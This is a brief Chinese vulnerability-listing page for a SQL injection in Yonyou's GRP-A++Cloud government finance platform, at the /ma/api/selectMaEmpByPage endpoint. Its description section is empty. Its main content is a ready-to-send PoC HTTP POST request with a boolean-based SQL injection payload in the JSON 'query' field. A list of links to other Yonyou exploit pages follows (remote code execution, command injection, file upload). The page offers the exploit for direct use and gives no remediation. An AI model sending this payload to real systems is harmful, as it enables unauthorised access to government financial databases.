用友政务 GRP-A++Cloud政府财务云 /ma/api/selectMaEmpByPage SQL注入漏洞

漏洞描述

PoC代码

POST /ma/api/selectMaEmpByPage HTTP/1.1
Accept-Encoding: gzip
Connection: close
Content-Length: 112
Content-Type: application/json
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/[REDACTED] Safari/537.36

{"rgCode":"","setYear":"2024","agencyCode":"","orgCode":"","query":"') AND 74506=745061 AND ('pzhG' LIKE 'pzhG"}

相关漏洞推荐

• 用友U8 Cloud /service/FileManageServlet 文件读取漏洞
• 用友 NC Cloud /ncchr/pm/obj/queryPsnInfo SQL 注入漏洞
• POC 用友U8Cloud pubsmsservlet 远程代码执行漏洞
• POC 用友 U8 Cloud pubsmsservlet 代码执行漏洞
• POC 用友U8Cloud pubsmsservlet 远程代码执行漏洞
• POC 用友 U8 Cloud pubsmsservlet 远程代码执行漏洞
• 用友 U8 Cloud /ServiceDispatcherServlet IFileTrans 文件上传漏洞
• 用友 U8 Cloud /ServiceDispatcherServlet IPFxxFileService 文件上传漏洞
• 用友U8Cloud NCCloudGatewayServlet 命令注入漏洞
• 用友 U8 Cloud NCCloudGatewayServlet 命令执行漏洞
• 用友 U8 Cloud NCCloudGatewayServlet存在命令执行漏洞
• POC 用友 U8 Cloud NCCloudGatewayServlet 命令执行漏洞
• Spring Cloud Gateway 信息泄露漏洞（CVE-2025-41243）